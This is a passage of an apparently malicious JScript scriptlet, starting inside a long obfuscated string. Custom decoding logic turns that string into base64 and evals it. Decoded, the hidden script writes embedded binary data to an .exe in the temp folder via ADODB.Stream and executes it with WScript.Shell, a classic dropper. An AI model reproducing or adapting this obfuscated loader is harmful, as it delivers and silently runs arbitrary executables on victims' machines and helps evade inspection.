(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(B4oCc(ICAgD(QoJdm(FyIGJ(pbmFy(eVN0c(mVhbS(A9IG5(ldyBB(Y3Rpd(mVYT2(JqZWN(0KCJB(RE9EQ(i5TdH(JlYW0(iKTsN(CiAgI(CBiaW(5hcnl(TdHJl(YW0uV(HlwZS(A9IDE(7IC8v(IOiuv(ue9ru(S4uuS(6jOi/(m+WIt(g0KIC(AgIGJ(pbmFy(eVN0c(mVhbS(5PcGV(uKCk7(DQogI(CAgDQ(ogICA(gLy8g(5bCGI(EJhc2(U2NCD(lrZfn(rKbku(LLova(zmjaL(kuLrk(uozov(5vliL(YNCiA(gICB2(YXIge(G1sID(0gbmV(3IEFj(dGl2Z(VhPYm(plY3Q(oIk1T(WE1MM(i5ET0(1Eb2N(1bWVu(dCIpO(w0KIC(AgIHZ(hciBl(bGVtI(D0geG(1sLmN(yZWF0(ZUVsZ(W1lbn(QoIkJ(hc2U2(NERhd(GEiKT(sNCiA(gICBl(bGVtL(mRhdG(FUeXB(lID0g(ImJpb(i5iYX(NlNjQ(iOw0K(ICAgI(GVsZW(0udGV(4dCA9(IGJhc(2U2NF(N0cml(uZzsN(CiAgI(CB2YX(IgYml(uYXJ5(RGF0Y(SA9IG(VsZW0(ubm9k(ZVR5c(GVkVm(FsdWU(7DQog(ICAgD(QogIC(AgLy8(g5bCG(5LqM6(L+b5Y(i25pW(w5o2u(5YaZ5(YWl5r(WBDQo(gICAg(YmluY(XJ5U3(RyZWF(tLldy(aXRlK(GJpbm(FyeUR(hdGEp(Ow0KI(CAgIA(0KICA(gIC8v(IOiOt(+WPlu(S4tOa(Xtueb(ruW9l(ei3r+(W+hA0(KICAg(IHZhc(iBzaG(VsbCA(9IG5l(dyBBY(3Rpdm(VYT2J(qZWN0(KCJXU(2NyaX(B0LlN(oZWxs(Iik7D(QogIC(AgdmF(yIHRl(bXBQY(XRoID(0gc2h(lbGwu(RXhwY(W5kRW(52aXJ(vbm1l(bnRTd(HJpbm(dzKCI(lVEVN(UCVcX(GguZX(hlIik(7DQog(ICAgD(QogIC(AgLy8(g5L+d(5a2Y5(Yiw5p(aH5Lu(2DQog(ICAgY(mluYX(J5U3R(yZWFt(LlNhd(mVUb0(ZpbGU(odGVt(cFBhd(GgsID(IpOyA(vLyAy(IOihq(Oekuu(imhue(bluao(oeW8j(w0KIC(AgYml(uYXJ5(U3RyZ(WFtLk(Nsb3N(lKCk7(DQogI(CBzaG(VsbC5(SdW4o(dGVtc(FBhdG(gpOw0(KDQoN(CiAgI(CANCi(AgICA(NCiAN(Cg0K"
	var decode_str = encode_str.split("(").join("");
	var decode_str = decode_str.split(")").join("=");

	decodeBase64 = function(s) {
   	 var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length;
    	var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    	for(i=0;i<64;i++){e[A.charAt(i)]=i;}
    	for(x=0;x<L;x++){
        	c=e[s.charAt(x)];b=(b<<6)+c;l+=6;
        	while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(r+=w(a));}
   	 }
    	return r;
	};

	var decoded = decodeBase64(decode_str);
	eval(decoded)
}
]]>
</script>
</scriptlet>
